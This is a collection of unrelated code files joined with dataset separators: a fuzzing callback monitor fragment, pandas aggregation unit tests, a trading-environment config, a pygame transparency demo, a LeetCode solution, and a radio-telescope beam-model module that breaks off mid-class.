                constants.ERR_CALLBACK_FUNC.format(func_name="restart_target") + traceback.format_exc()
            )
        finally:
            fuzz_data_logger.open_test_step("Cleaning up connections from callbacks")
            target.close()
            if session._reuse_target_connection:
                fuzz_data_logger.open_test_step("Reopening target connection")
                target.open()
        # True iff any restart callback was configured (and thus executed).
        return bool(self.on_restart_target)

    def post_start_target(self, target=None, fuzz_data_logger=None, session=None):
        """Called after a target is started or restarted."""
        try:
            for f in self.on_post_start_target:
                fuzz_data_logger.open_test_step('Post-start-target callback: "{0}"'.format(f.__name__))
                f(target=target, fuzz_data_logger=fuzz_data_logger, session=session, sock=target)
        except Exception:
            fuzz_data_logger.log_error(
                constants.ERR_CALLBACK_FUNC.format(func_name="post_start_target") + traceback.format_exc()
            )

    def __repr__(self):
        return "CallbackMonitor#{}[pre=[{}],post=[{}],restart=[{}],post_start_target=[{}]]".format(
            id(self),
            ", ".join([x.__name__ for x in self.on_pre_send]),
            ", ".join([x.__name__ for x in self.on_post_send]),
            ", ".join([x.__name__ for x in self.on_restart_target]),
            ", ".join([x.__name__ for x in self.on_post_start_target]),
        )
| StarcoderdataPython |
11307102 | # MIT License
#
# Copyright (c) 2020 OdinLabs IO
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import unittest
import numpy
import pandas as pd
from app.aggregation import pandas_eval_factory
from app.aggregation.aggregation_expr import aggregation_dag
eval_factory = pandas_eval_factory()
class AggregationDAGTest(unittest.TestCase):
    """Tests for building and evaluating aggregation-expression DAGs with the
    pandas evaluator factory (SUM / CUMSUM / ROLSUM / COUNT / UCOUNT)."""
    def test_reduction_dag(self):
        """Simple aggregation statement parsing"""
        df = pd.DataFrame({'A': [0, 1, 2, 3, 4],
                           'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
                           'C': ['Jan', 'Jan', 'Jan', 'Feb', 'Feb']})
        # SUM of A restricted to rows where B == "Lundi".
        dag = aggregation_dag("SUM('A', EQ('B', \"Lundi\"))")
        evaluator = eval_factory.evaluator('aggregationStatement').build(0, dag)
        result = \
            df.groupby(['B']).apply(
                lambda x: pd.DataFrame({'m': evaluator(x, evaluator.emit_columns())}))
        index = result.index
        result.index = index.droplevel(len(index.names) - 1)
        print(result)
        result = result.reset_index()['m']
        self.assertEqual(len(result), 1)
        self.assertEqual(result[0], 1)
        # Same statement evaluated under a two-level grouping.
        result = df.groupby(['B', 'C']).apply(
            lambda x: pd.DataFrame({'m': evaluator(x, evaluator.emit_columns())}))
        index = result.index
        result.index = index.droplevel(len(index.names) - 1)
        print(result)
        result = result.reset_index()
        self.assertEqual(len(result), 1)
        m = result['m']
        self.assertEqual(m[0], 1)
        B = result['B']
        self.assertEqual(B[0], 'Lundi')
        C = result['C']
        self.assertEqual(C[0], 'Jan')
    def test_cum_sum(self):
        """CUMSUM over D, ordered ascending by A, within each B group."""
        df = pd.DataFrame({'A': [4, 3, 2, 1, 0],
                           'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
                           'D': [20, 30, 40, 50, 60]})
        dag = aggregation_dag("CUMSUM(ASC 'A', 'D')")
        evaluator = eval_factory.evaluator('aggregationStatement').build(0, dag)
        result = df.groupby(['B']).apply(lambda x: pd.DataFrame({'m': evaluator(x, evaluator.emit_columns())}))
        print(result)
        result = result.reset_index()
        m = result['m']
        self.assertEqual(m[0], 30)
        self.assertEqual(m[1], 50)
        self.assertEqual(m[2], 40)
        self.assertEqual(m[3], 60)
        self.assertEqual(m[4], 110)
    def test_rol_sum(self):
        """ROLSUM with window 2 equals CUMSUM here since groups have <= 2 rows."""
        df = pd.DataFrame({'A': [4, 3, 2, 1, 0],
                           'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
                           'D': [20, 30, 40, 50, 60]})
        dag = aggregation_dag("ROLSUM(2, ASC 'A', 'D')")
        evaluator = eval_factory.evaluator('aggregationStatement').build(0, dag)
        result = df.groupby(['B']).apply(lambda x: pd.DataFrame({'m': evaluator(x, evaluator.emit_columns())}))
        print(result)
        result = result.reset_index()
        m = result['m']
        self.assertEqual(m[0], 30)
        self.assertEqual(m[1], 50)
        self.assertEqual(m[2], 40)
        self.assertEqual(m[3], 60)
        self.assertEqual(m[4], 110)
    def test_rol_sum_and_sum_aggr(self):
        """Evaluate a plain SUM and a descending-by-T ROLSUM in one pass."""
        df = pd.DataFrame({'A': [4, 3, 2, 1, 27],
                           'T': ["2020-01-01", "2020-01-02", "2020-01-03", "2020-01-04", "2020-01-05"],
                           'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
                           'D': [20, 30, 40, 50, 60]})
        dag1 = aggregation_dag("SUM('D')")
        dag2 = aggregation_dag("ROLSUM(2, DESC 'T', 'D')")
        evaluator1 = eval_factory.evaluator('aggregationStatement').build(0, dag1)
        evaluator2 = eval_factory.evaluator('aggregationStatement').build(0, dag2)
        # Union of the columns both evaluators need to emit.
        index = []
        index += evaluator1.emit_columns()
        index += evaluator2.emit_columns()
        result = df.groupby(['B']).apply(
            lambda x: pd.DataFrame({'m': evaluator1(x, index), 'm2': evaluator2(x, index)}))
        # index = result.index
        # index = index.droplevel(len(index.names)-1)
        # result.index = index
        print(result)
        result = result.reset_index()
        m = result['m2']
        self.assertEqual(m[0], 50.0)
        self.assertEqual(m[1], 30.0)
        self.assertEqual(m[2], 40.0)
        self.assertEqual(m[3], 110.0)
        self.assertEqual(m[4], 60.0)
        m = result['m']
        self.assertEqual(m[0], 20.0)
        self.assertEqual(m[1], 30.0)
        self.assertEqual(m[2], 40.0)
        self.assertEqual(m[3], 50.0)
        self.assertEqual(m[4], 60.0)
    def test_rol_sum_and_sum_aggr_filter(self):
        """Filtered SUM yields NaN for excluded groups; ROLSUM is unaffected."""
        df = pd.DataFrame({'A': [4, 3, 2, 1, 27],
                           'T': ["2020-01-01", "2020-01-02", "2020-01-03", "2020-01-04", "2020-01-05"],
                           'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
                           'D': [20, 30, 40, 50, 60]})
        dag1 = aggregation_dag("SUM('D', IN('B', [\"Lundi\",\"Mercredi\"]))")
        dag2 = aggregation_dag("ROLSUM(2, DESC 'T', 'D')")
        evaluator1 = eval_factory.evaluator('aggregationStatement').build(0, dag1)
        evaluator2 = eval_factory.evaluator('aggregationStatement').build(0, dag2)
        index = []
        index += evaluator1.emit_columns()
        index += evaluator2.emit_columns()
        result = df.groupby(['B']).apply(
            lambda x: pd.DataFrame({'m': evaluator1(x, index), 'm2': evaluator2(x, index)}))
        # index = result.index
        # index = index.droplevel(len(index.names)-1)
        # result.index = index
        print(result)
        result = result.reset_index()
        m = result['m2']
        self.assertEqual(m[0], 50.0)  # asc order preserved because of sum index
        self.assertEqual(m[1], 30.0)
        self.assertEqual(m[2], 40.0)
        self.assertEqual(m[3], 60.0)  # desc
        self.assertEqual(m[4], 110.0)
        m = result['m']
        self.assertEqual(m[0], 20.0)
        self.assertEqual(m[1], 30.0)
        self.assertEqual(m[2], 40.0)
        # BUG FIX: ``numpy.math`` was a private alias of the stdlib ``math``
        # module and has been removed in NumPy 2.0; ``numpy.isnan`` gives the
        # same answer for these scalars.
        self.assertTrue(numpy.isnan(m[3]))
        self.assertTrue(numpy.isnan(m[4]))
    def test_rol_sum_and_count(self):
        """COUNT and UCOUNT are both 1 per row; ROLSUM matches the earlier test."""
        df = pd.DataFrame({'A': [4, 3, 2, 1, 27],
                           'T': ["2020-01-01", "2020-01-02", "2020-01-03", "2020-01-04", "2020-01-05"],
                           'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
                           'D': [20, 30, 40, 50, 60]})
        dag1 = aggregation_dag("COUNT('D')")
        dag3 = aggregation_dag("UCOUNT('D')")
        dag2 = aggregation_dag("ROLSUM(2, DESC 'T', 'D')")
        evaluator1 = eval_factory.evaluator('aggregationStatement').build(0, dag1)
        evaluator2 = eval_factory.evaluator('aggregationStatement').build(0, dag2)
        evaluator23 = eval_factory.evaluator('aggregationStatement').build(0, dag3)
        index = []
        index += evaluator1.emit_columns()
        index += evaluator2.emit_columns()
        result = df.groupby(['B']).apply(
            lambda x: pd.DataFrame(
                {'m': evaluator1(x, index), 'm2': evaluator2(x, index), 'm3': evaluator23(x, index)}))
        # index = result.index
        # index = index.droplevel(len(index.names)-1)
        # result.index = index
        print(result)
        result = result.reset_index()
        m = result['m2']
        self.assertEqual(m[0], 50.0)
        self.assertEqual(m[1], 30.0)
        self.assertEqual(m[2], 40.0)
        self.assertEqual(m[3], 110.0)
        self.assertEqual(m[4], 60.0)
        m = result['m']
        self.assertEqual(m[0], 1)
        self.assertEqual(m[1], 1)
        self.assertEqual(m[2], 1)
        self.assertEqual(m[3], 1)
        self.assertEqual(m[4], 1)
        m = result['m3']
        self.assertEqual(m[0], 1)
        self.assertEqual(m[1], 1)
        self.assertEqual(m[2], 1)
        self.assertEqual(m[3], 1)
        self.assertEqual(m[4], 1)
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
| StarcoderdataPython |
228823 | <filename>project_proteus/env/simple/simple_config.py
from project_proteus.env.base import BaseConfig
class SimpleConfig(BaseConfig):
    """Configuration for the "simple" trading environment.

    Settings are grouped in three nested namespace classes (database,
    portfolio, env); the nested classes are never instantiated.
    """
    class database:
        # path to the database
        path = ""
        # which candlestick interval should be used in the environment
        candlestick_interval = ""
    class portfolio:
        # the initial amount of the quote asset
        # example: symbol=BTCUSDT --> initial_amount = amount of USDT in the beginning
        initial_amount = 1000
        # trading fees of the exchange in percent
        trading_fees = 0.036 #[%]
    class env:
        # number of steps the agent can take in the environment before it gets reset
        num_steps = 10
        # length of the observation window -- presumably the number of past
        # candlesticks visible to the agent per step; TODO confirm in env code
        window_length = 10
# Read a comma-separated list of words and print each word with its length,
# e.g. input "ab, cde" -> output "ab -> 2, cde -> 3".
tokens = input().split(", ")
formatted = (f"{token} -> {len(token)}" for token in tokens)
print(", ".join(formatted))
| StarcoderdataPython |
11385387 | import pygame
'''The following code shows how to add transparency to an
image and shows which images can be made transparent.
This example was created using this tutorial
https://www.pygame.org/docs/tut/ChimpLineByLine.html
Line By Line Chimp
Author: <NAME>
https://www.pygame.org/docs/ref/surface.html
Colorkey transparency makes a single color value transparent.
Per pixel alphas are different because they store a transparency value
for every pixel. This allows for the most precise transparency effects,
but it also the slowest. Per pixel alphas cannot be mixed with surface
alpha and colorkeys.
'''
def loadImage(name, colorkey=None):
    """Load an image from disk and convert it for fast blitting.

    Parameters
    ----------
    name : str
        Path of the image file to load.
    colorkey : tuple | int | None
        Color to treat as transparent.  ``None`` disables transparency,
        ``-1`` means "use the color of the upper-left pixel", and any
        other value is used directly as the colorkey color.

    Returns
    -------
    pygame.Surface
        The converted (and optionally color-keyed) surface.  On load
        failure the program prints an error, shuts pygame down and exits.
    """
    # Load the image from file; bail out cleanly if the path is wrong.
    try:
        image = pygame.image.load(name)
    except pygame.error:
        print('ERROR: Failed to load image named "'+name+'". Probably a typo.')
        pygame.quit()
        exit()
    # convert() returns a copy matched to the display pixel format, which
    # blits much faster than the raw loaded surface.
    image = image.convert()
    # If colorkey is None, don't apply any transparency.
    if colorkey is not None:
        # -1 is a sentinel: sample the upper-left pixel as the transparent
        # color.  Use ==, not "is": identity comparison against an int
        # literal is implementation-defined and raises a SyntaxWarning on
        # Python 3.8+.
        if colorkey == -1:
            colorkey = image.get_at((0,0))
        # RLEACCEL: slower to modify the surface, but faster to blit it.
        image.set_colorkey(colorkey, pygame.RLEACCEL)
    return image
if __name__ == "__main__":
    # Initialise pygame and open a 600x600 window for the demo.
    pygame.init()
    width = 600
    height = 600
    screen = pygame.display.set_mode((width, height))
    clock = pygame.time.Clock()
    pygame.display.set_caption('Transparency Example')
    pygame.mouse.set_visible(0) #Invisible mouse!
    black = 0,0,0
    white = 255,255,255
    blue = 0,0,255
    #Load images
    #-1 tells loadImage to use upper left most pixel color as transparent color
    image0 = loadImage('hand.jpg', -1) #Transparency DOES NOT work with jpegs
    image1 = loadImage('ball.png', -1) #Transparency works with pngs
    image2 = loadImage('destroyer.gif', -1) #Transparency works with gifs
    image3 = loadImage('ball.png') #No transparency because no -1
    image4 = loadImage('blue_example.png', blue) #Alternate colorkey example
    image5 = loadImage('planet002.png', -1) #Transparency works with previously transparent pixels
    running = True
    # Main loop: runs until the window receives a QUIT event (window closed).
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
        screen.fill(blue) #paint background blue
        #Draw all the images on the screen.
        # Blit order matters: later blits draw on top of earlier ones.
        screen.blit(image5, (0,0))
        screen.blit(image4, (300,300))
        screen.blit(image3, (100,400))
        screen.blit(image2, (200,200))
        screen.blit(image1, (400,400))
        screen.blit(image0, (0,0))
        pygame.display.flip()
        # Cap the frame rate at ~30 FPS.
        clock.tick(30)
    pygame.quit()
8146669 | <reponame>mehrab97/Leetcoding
class Solution:
    def findNumbers(self, nums: List[int]) -> int:
        """Return how many integers in *nums* have an even number of digits.

        The previous empty-list guard was redundant: ``sum`` over an empty
        generator is already 0.  A generator expression also avoids building
        an intermediate list.

        Note: ``len(str(x))`` counts decimal digits; inputs are assumed
        non-negative (per the problem constraints), otherwise the minus
        sign would be counted as a digit.
        """
        return sum(1 for x in nums if len(str(x)) % 2 == 0)
6557605 | """Beam models and chromaticity corrections."""
from __future__ import annotations
from pathlib import Path
import logging
import hashlib
from methodtools import lru_cache
import astropy.coordinates as apc
import astropy.time as apt
import h5py
import numpy as np
import scipy.interpolate as spi
from tqdm import tqdm
import attr
from . import coordinates as coords
from .loss import ground_loss
from . import sky_models
from edges_io.h5 import HDF5Object
from ..config import config
from .. import const
from edges_cal import (
FrequencyRange,
modelling as mdl,
)
from .data import BEAM_PATH
from . import types as tp
logger = logging.getLogger(__name__)
# Reference UTC observation time. At this time, the LST is 0.1666 (00:10 Hrs LST) at the
# EDGES location. NOTE: this is used by default, but can be changed by the user anywhere
# it is used.
REFERENCE_TIME = apt.Time("2014-01-01T09:39:42", location=const.edges_location)
@attr.s
class Beam:
beam = attr.ib()
frequency = attr.ib()
elevation = attr.ib()
azimuth = attr.ib()
simulator = attr.ib(default=None, converter=str)
instrument = attr.ib(default=None, converter=str)
raw_file = attr.ib(default=None, converter=str)
@classmethod
def from_hfss(
cls,
path: [str, Path],
frequency: float,
linear: bool = True,
theta_min: float = 0,
theta_max: float = 180,
theta_resolution: float = 1,
phi_min: float = 0,
phi_max: float = 359,
phi_resolution: float = 1,
) -> Beam:
"""
Create a Beam object from a HFSS file.
Parameters
----------
path
Path to the file. Use :meth:`resolve_file` to get the absolute path
from a a relative path (starting with ':').
linear
Whether the beam values are in linear units (or decibels)
theta_min, theta_max
Min/Max of the zenith angle (degrees)
theta_resolution
Resolution of the zenith angle.
phi_min, phi_max
Min/Max of the azimuth angles (degrees)
phi_resolution
The resolution of the azimuth angle.
Returns
-------
beam
The beam object.
"""
d = np.genfromtxt(path, skip_header=1, delimiter=",")
theta = np.arange(theta_min, theta_max + theta_resolution, theta_resolution)
phi = np.arange(phi_min, phi_max + phi_resolution, phi_resolution)
beam_map = np.zeros((len(theta), len(phi)))
for i in range(len(theta)):
mask = d[:, 1] == theta[i]
this_phi = d[mask, 0]
this_power = d[mask, 2]
this_phi[this_phi < 0] += 360
this_phi, unique_inds = np.unique(this_phi, axis=0, return_index=True)
this_power = this_power[unique_inds]
this_power = this_power[np.argsort(this_phi)]
if not linear:
this_power = 10 ** (this_power / 10)
this_power[np.isnan(this_power)] = 0
beam_map[i, :] = this_power
return Beam(
frequency=np.array([frequency]),
elevation=theta,
azimuth=phi,
beam=beam_map,
simulator="hfss",
raw_file=path,
)
@classmethod
def from_wipld(cls, path: tp.PathLike, az_antenna_axis: float = 0) -> Beam:
"""Read a WIPL-D beam."""
with open(path) as fn:
file_length = 0
number_of_frequencies = 0
flag_columns = False
frequencies_list = []
for line in fn:
file_length += 1
if line[2] == ">":
number_of_frequencies += 1
frequencies_list.append(float(line[19:32]))
elif not flag_columns:
line_splitted = line.split()
number_of_columns = len(line_splitted)
flag_columns = True
rows_per_frequency = (
file_length - number_of_frequencies
) / number_of_frequencies
output = np.zeros(
(
int(number_of_frequencies),
int(rows_per_frequency),
int(number_of_columns),
)
)
frequencies = np.array(frequencies_list)
with open(path) as fn:
i = -1
for line in fn:
if line[2] == ">":
i += 1
j = -1
else:
j += 1
line_splitted = line.split()
line_array = np.array(line_splitted, dtype=float)
output[i, j, :] = line_array
# Re-arrange data
phi_u = np.unique(output[0, :, 0])
theta_u = np.unique(output[0, :, 1])
beam = np.zeros((len(frequencies), len(theta_u), len(phi_u)))
for i in range(len(frequencies)):
out_2D = output[i, :, :]
phi = out_2D[:, 0]
theta = (
90 - out_2D[:, 1]
) # theta is zero at the zenith, and goes to 180 deg
gain = out_2D[:, 6]
theta_u = np.unique(theta)
it = np.argsort(theta_u)
theta_a = theta_u[it]
for j in range(len(theta_a)):
phi_j = phi[theta == theta_a[j]]
gain_j = gain[theta == theta_a[j]]
ip = np.argsort(phi_j)
gp = gain_j[ip]
beam[i, j, :] = gp
# Flip beam from theta to elevation
beam_maps = beam[:, ::-1, :]
# Change coordinates from theta/phi, to AZ/EL
el = np.arange(0, 91)
az = np.arange(0, 360)
# Shifting beam relative to true AZ (referenced at due North)
beam_maps_shifted = cls.shift_beam_maps(az_antenna_axis, beam_maps)
return Beam(
frequency=frequencies,
azimuth=az,
elevation=el,
beam=beam_maps_shifted,
simulator="wipl-d",
raw_file=path,
)
@classmethod
def from_ideal(cls, delta_f=2, f_low=40, f_high=200, delta_az=1, delta_el=1):
"""Create an ideal beam that is completely unity."""
freq = np.arange(f_low, f_high, delta_f)
az = np.arange(0, 360, delta_az)
el = np.arange(0, 90 + 0.1 * delta_el, delta_el)
return Beam(
frequency=freq,
azimuth=az,
elevation=el,
beam=np.ones((len(freq), len(el), len(az))),
simulator="ideal",
)
@classmethod
def from_feko(cls, path: [str, Path], az_antenna_axis: float = 0) -> Beam:
"""
Read a FEKO beam file.
Parameters
----------
filename
The path to the file.
az_antenna_axis
The azimuth of the primary antenna axis, in degrees.
Returns
-------
beam_maps
A ``(Nfreq, Nel, Naz)`` array giving values of the beam. Note that elevation
and azimuth are always in 1-degree increments.
freq
The frequencies at which the beam is defined.
"""
filename = Path(path)
data = np.genfromtxt(str(filename))
frequency = []
with open(filename) as fl:
for line in fl.readlines():
if line.startswith("#FREQUENCY"):
line = line.split(" ")
indx = line.index("MHz")
frequency.append(float(line[indx - 1]))
freq = FrequencyRange(np.array(frequency))
# Loading data and convert to linear representation
beam_maps = np.zeros((len(frequency), 91, 360))
for i in range(len(frequency)):
beam_maps[i] = (10 ** (data[(i * 360) : ((i + 1) * 360), 2::] / 10)).T
# Shifting beam relative to true AZ (referenced at due North)
# Due to angle of orientation of excited antenna panels relative to due North
beam_maps = cls.shift_beam_maps(az_antenna_axis, beam_maps)
return Beam(
frequency=freq.freq,
beam=beam_maps,
azimuth=np.arange(0, 360),
elevation=np.arange(0, 91),
simulator="feko",
raw_file=path,
)
@classmethod
def from_cst(
cls,
file_name_prefix: tp.PathLike,
f_low: int = 40,
f_high: int = 100,
freq_p: int = 61,
theta_p: float = 181,
phi_p: float = 361,
az_antenna_axis: float = 0,
) -> Beam:
"""
Read a CST beam file.
Parameters
----------
filename
The path to the file.
az_antenna_axis
The azimuth of the primary antenna axis, in degrees.
f_low, f_high
lower and higher frequency bounds
freq_p
Number of frequency points in the simulation file.
theta_p
Number of zenith angle points in the simulation file.
phi_p
Number of azimuth points in the simulation file.
Returns
-------
beam
The beam object.
"""
phi_t = np.zeros((freq_p, theta_p * phi_p))
frequency = np.linspace(f_low, f_high, freq_p)
beam_square = np.zeros((freq_p, theta_p, phi_p))
res = (f_high - f_low) / (freq_p - 1)
for i in range(freq_p):
n = int(i * res + f_low)
fc_file = open(
file_name_prefix + "farfield (f=" + str(n) + ") [1].txt", "rb"
) #
for x, line in enumerate(fc_file):
if x > 1:
check = 0
for o in range(len(line)):
if line[o] != "":
check = check + 1
if check == 3:
phi_t[i][x - 2] = float(line.split()[2])
fc_file.close()
for i in range(freq_p):
for x in range(phi_p):
beam_square[i, :, x] = phi_t[i, x * theta_p : (x + 1) * theta_p]
beam_square[i, :, 0 : int(phi_p / 2)] = beam_square[
i, :, int(phi_p / 2) : phi_p - 1
]
freq = FrequencyRange(np.array(frequency))
beam_square[:, 91:, :] = 0
beam_maps = np.flip(beam_square[:, :91, :360], axis=1)
# Shifting beam relative to true AZ (referenced at due North)
# Due to angle of orientation of excited antenna panels relative to due North
beam_maps = cls.shift_beam_maps(az_antenna_axis, beam_maps)
return Beam(
frequency=freq.freq,
beam=beam_maps,
azimuth=np.arange(0, 360),
elevation=np.arange(0, 91),
simulator="cst",
raw_file=file_name_prefix,
)
@classmethod
def from_feko_raw(
cls,
file_name_prefix: tp.PathLike,
ext: str = "txt",
f_low: int = 40,
f_high: int = 100,
freq_p: int = 61,
theta_p: float = 181,
phi_p: float = 361,
az_antenna_axis: float = 0,
) -> Beam:
"""
Read a FEKO beam file.
Parameters
----------
filename
The path to the file.
az_antenna_axis
The azimuth of the primary antenna axis, in degrees.
f_low, f_high
lower and higher frequency bounds
freq_p
Number of frequency points in the simulation file.
theta_p
Number of zenith angle points in the simulation file.
phi_p
Number of azimuth points in the simulation file.
Returns
-------
beam
The beam object.
"""
beam_square = np.zeros((freq_p, theta_p, phi_p))
frequency = np.linspace(f_low, f_high, freq_p)
f1 = open(str(file_name_prefix) + "_0-90." + ext)
f2 = open(str(file_name_prefix) + "_91-180." + ext)
f3 = open(str(file_name_prefix) + "_181-270." + ext)
f4 = open(str(file_name_prefix) + "_271-360." + ext)
z = (
theta_p * 91 + 10
) # ---> change this to no.of theta * no.of phi + No.of header lines
for index, line in enumerate(f1):
if index % z == 0:
co = 0
if index % z >= 10:
x = list(map(float, line.split()))
beam_square[int(index / z), co % theta_p, int(co / theta_p)] = 10 ** (
x[8] / 10
)
co += 1
z = theta_p * 90 + 10 #
for index, line in enumerate(f2):
if index % z == 0:
co = 0
if index % z >= 10:
x = list(map(float, line.split()))
beam_square[
int(index / z), co % theta_p, int(co / theta_p) + 91
] = 10 ** (x[8] / 10)
co += 1
for index, line in enumerate(f3):
if index % z == 0:
co = 0
if index % z >= 10:
x = list(map(float, line.split()))
beam_square[
int(index / z), co % theta_p, int(co / theta_p) + 181
] = 10 ** (x[8] / 10)
co += 1
for index, line in enumerate(f4):
if index % z == 0:
co = 0
if index % z >= 10:
x = list(map(float, line.split()))
beam_square[
int(index / z), co % theta_p, int(co / theta_p) + 271
] = 10 ** (x[8] / 10)
co += 1
freq = FrequencyRange(np.array(frequency))
beam_square[:, 90:, :] = 0
beam_maps = np.flip(beam_square[:, :91, :360], axis=1)
# Shifting beam relative to true AZ (referenced at due North)
# Due to angle of orientation of excited antenna panels relative to due North
beam_maps = cls.shift_beam_maps(az_antenna_axis, beam_maps)
return Beam(
frequency=freq.freq,
beam=beam_maps,
azimuth=np.arange(0, 360),
elevation=np.arange(0, 91),
simulator="feko",
raw_file=file_name_prefix,
)
@classmethod
def get_beam_path(cls, band: str, kind: str | None = None) -> Path:
"""Get a standard path to a beam file."""
pth = BEAM_PATH / band / "default.txt" if not kind else kind + ".txt"
if not pth.exists():
raise FileNotFoundError(f"No beam exists for band={band}.")
return pth
def at_freq(
self,
freq: np.ndarray,
model: mdl.Model = mdl.Polynomial(
n_terms=13, transform=mdl.ScaleTransform(scale=75.0)
),
) -> Beam:
"""
Interpolate the beam to a new set of frequencies.
Parameters
----------
freq
Frequencies to interpolate to.
Returns
-------
beam
The Beam object at the new frequencies.
"""
if len(self.frequency) < 3:
raise ValueError(
"Can't freq-interpolate beam that has fewer than three frequencies."
)
# Frequency interpolation
interp_beam = np.zeros((len(freq), len(self.elevation), len(self.azimuth)))
cached_model = model.at(x=self.frequency)
for i, bm in enumerate(self.beam.T):
for j, b in enumerate(bm):
model_fit = cached_model.fit(ydata=b)
interp_beam[:, j, i] = model_fit.evaluate(freq)
return Beam(
frequency=freq,
azimuth=self.azimuth,
elevation=self.elevation,
beam=interp_beam,
)
def smoothed(
self,
model: mdl.Model = mdl.Polynomial(n_terms=12),
) -> Beam:
"""
Smoothes the beam within its same set of frequencies.
----------
Returns
-------
beam
The Beam object smoothed over its same frequencies.
"""
if len(self.frequency) < 3:
raise ValueError(
"Can't freq-interpolate beam that has fewer than three frequencies."
)
# Frequency smoothing
smooth_beam = np.zeros_like(self.beam)
cached_model = model.at(x=self.frequency)
for i, bm in enumerate(self.beam.T):
for j, b in enumerate(bm):
model_fit = cached_model.fit(ydata=b)
smooth_beam[:, j, i] = model_fit.evaluate()
return Beam(
frequency=self.frequency,
azimuth=self.azimuth,
elevation=self.elevation,
beam=smooth_beam,
)
@staticmethod
def shift_beam_maps(az_antenna_axis: float, beam_maps: np.ndarray):
"""Rotate beam maps around an axis.
Parameters
----------
az_antenna_axis
The aximuth angle of the antenna axis.
beam_maps
Beam maps as a function of frequency, za and az.
Returns
-------
beam maps
Array of the same shape as the input, but rotated.
"""
if az_antenna_axis < 0:
index = -az_antenna_axis
bm1 = beam_maps[:, :, index::]
bm2 = beam_maps[:, :, 0:index]
return np.append(bm1, bm2, axis=2)
elif az_antenna_axis > 0:
index = az_antenna_axis
bm1 = beam_maps[:, :, 0:(-index)]
bm2 = beam_maps[:, :, (360 - index) : :]
return np.append(bm2, bm1, axis=2)
else:
return beam_maps
@classmethod
def resolve_file(
cls,
path: tp.PathLike,
band: str | None = None,
configuration: str = "default",
simulator: str = "feko",
) -> Path:
"""Resolve a file path to a standard location."""
if str(path) == ":":
if band is None:
raise ValueError("band must be given if path starts with a colon (:)")
# Get the default beam file.
return BEAM_PATH / band / f"{configuration}.txt"
elif str(path).startswith(":"):
if band is None:
raise ValueError("band must be given if path starts with a colon (:)")
# Use a beam file in the standard directory.
return (
Path(config["paths"]["beams"]).expanduser()
/ f"{band}/simulations/{simulator}/{str(path)[1:]}"
).absolute()
else:
return Path(path).absolute()
@classmethod
def from_file(
cls,
band: str | None,
simulator: str = "feko",
beam_file: tp.PathLike = ":",
configuration: str = "default",
rotation_from_north: float = 90,
) -> Beam:
"""Read a beam from file."""
beam_file = cls.resolve_file(beam_file, band, configuration, simulator)
if simulator == "feko":
rotation_from_north -= 90
out = cls.from_feko(beam_file, az_antenna_axis=rotation_from_north)
elif simulator == "wipl-d": # Beams from WIPL-D
out = cls.from_wipld(beam_file, rotation_from_north)
elif simulator == "hfss":
out = cls.from_hfss(beam_file)
else:
raise ValueError(f"Unknown value for simulator: '{simulator}'")
out.instrument = band
return out
@lru_cache(maxsize=1000)
def angular_interpolator(self, freq_indx: int):
"""Return a callable function that interpolates the beam.
The returned function has the signature ``interp(az, el)``, where ``az`` is
azimuth in degrees, and ``el`` is elevation in degrees. They may be arrays,
in which case they should be the same length.
"""
el = self.elevation * np.pi / 180 + np.pi / 2
beam = self.beam[freq_indx]
if el[-1] > 0.999 * np.pi:
el = el[:-1]
beam = beam[:-1]
spl = spi.RectSphereBivariateSpline(
el,
self.azimuth * np.pi / 180,
beam,
pole_values=(None, beam[-1]),
pole_exact=True,
)
return lambda az, el: spl(
el * np.pi / 180 + np.pi / 2, az * np.pi / 180, grid=False
)
def between_freqs(self, low=0, high=np.inf) -> Beam:
"""Return a new :class:`Beam` object restricted a given frequency range."""
mask = (self.frequency >= low) & (self.frequency <= high)
return attr.evolve(self, frequency=self.frequency[mask], beam=self.beam[mask])
    def get_beam_solid_angle(self) -> float:
        """Calculate the integrated beam solid angle.

        Riemann sum of beam * sin(theta) over the (el, az) grid, scaled by
        the per-pixel solid angle and normalised by 4*pi.
        """
        # Theta vector valid for the FEKO beams. In the beam, dimension 1 increases
        # from index 0 to 90 corresponding to elevation, which is 90-theta
        theta = self.elevation[::-1]
        sin_theta = np.sin(theta * (np.pi / 180))
        # Broadcast sin(theta) across the azimuth axis.  NOTE(review): the
        # 360 here assumes a 1-degree azimuth grid (true for the FEKO/CST
        # readers in this class, but not enforced) -- confirm if reused.
        sin_theta_2D = np.tile(sin_theta, (360, 1)).T
        beam_integration = np.sum(self.beam * sin_theta_2D)
        # (pi/180)^2 is the solid angle of one 1deg x 1deg pixel.
        return (1 / (4 * np.pi)) * ((np.pi / 180) ** 2) * beam_integration
class BeamFactor(HDF5Object):
"""A non-interpolated beam factor."""
_structure = {
"frequency": lambda x: (x.ndim == 1 and x.dtype == float),
"lst": lambda x: (x.ndim == 1 and x.dtype == float),
"antenna_temp_above_horizon": lambda x: (x.ndim == 2 and x.dtype == float),
"loss_fraction": lambda x: (x.ndim == 2 and x.dtype == float),
"beam_factor": lambda x: (x.ndim == 2 and x.dtype == float),
